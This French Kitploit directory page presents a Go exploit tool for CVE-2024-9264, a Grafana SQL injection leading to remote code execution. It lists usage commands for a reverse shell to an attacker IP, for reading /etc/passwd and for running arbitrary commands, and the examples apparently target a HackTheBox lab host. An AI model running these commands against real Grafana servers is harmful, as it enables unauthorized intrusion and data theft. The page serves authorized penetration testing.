Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-9264 — Une implémentation go pour CVE-2024-9264 qui affecte les versions 11.0.x, 11.1.x et 11.2.x de grafana. | Kitploit
Outils/GitHubGitHub/cythonic1/cve-2024-9264
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubcythonic1/cve-2024-9264

CVE-2024-9264

Une implémentation go pour CVE-2024-9264 qui affecte les versions 11.0.x, 11.1.x et 11.2.x de grafana.

Voir le dépôt
31il y a 1 anPas encore vérifié
Site web

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🚨 CVE-2024-9264 - Injection SQL dans Grafana conduisant à une exécution de code à distance (RCE) et à la lecture de fichiers

Outil d'exploitation pour CVE-2024-9264, une vulnérabilité critique dans Grafana permettant à un attaquant authentifié d'exécuter une requête SQL conduisant à une RCE

🛡️ Cet outil est strictement destiné à des fins éducatives et à des tests d'intrusion autorisés.
Toute utilisation non autorisée est illégale et contraire à l'éthique.


🧠 Aperçu de la vulnérabilité

🕳️ Qu'est-ce que la CVE-2024-9264 ?

CVE-2024-9264 est une faille critique dans Grafana permettant à un attaquant authentifié d'exécuter des commandes SQL conduisant à une RCE et à la lecture de fichiers

🧬 Cause racine

  • Assainissement insuffisant.

💥 Impact

  • RCE : Exécuter des commandes arbitraires, obtenir des shells inversés ou lire des fichiers sensibles.
  • Sévérité élevée : Prise de contrôle totale du serveur possible en cas de succès.

⚒️ Fonctionnalités

  • Prend en charge plusieurs modes d'attaque :
    • file – Lire des fichiers arbitraires (par exemple, /etc/passwd)
    • shell – Shell inversé vers la machine de l'attaquant
    • command – Exécuter des commandes shell arbitraires (par exemple, whoami)
  • IP, port et identifiants de l'attaquant personnalisables

🚀 Utilisation

menu d'aide

Tous les arguments ne sont pas nécessaires.

exemples

Obtenir un shell

go run main.go -ip 10.10.16.91 -port 8080 -username admin -password 0D5oT70Fq13EvB5r -url http://grafana.planning.htb -type shell

Lire des fichiers

go run main.go -username admin -password 0D5oT70Fq13EvB5r -url http://grafana.planning.htb -type file -filename /etc/passwd

Exécuter une seule commande

go run main.go -username admin -password 0D5oT70Fq13EvB5r -url http://grafana.planning.htb -type command -cmd 'ls -al'

🔧 Options de la ligne de commande

go run main.go [flags]

Télécharger l’outil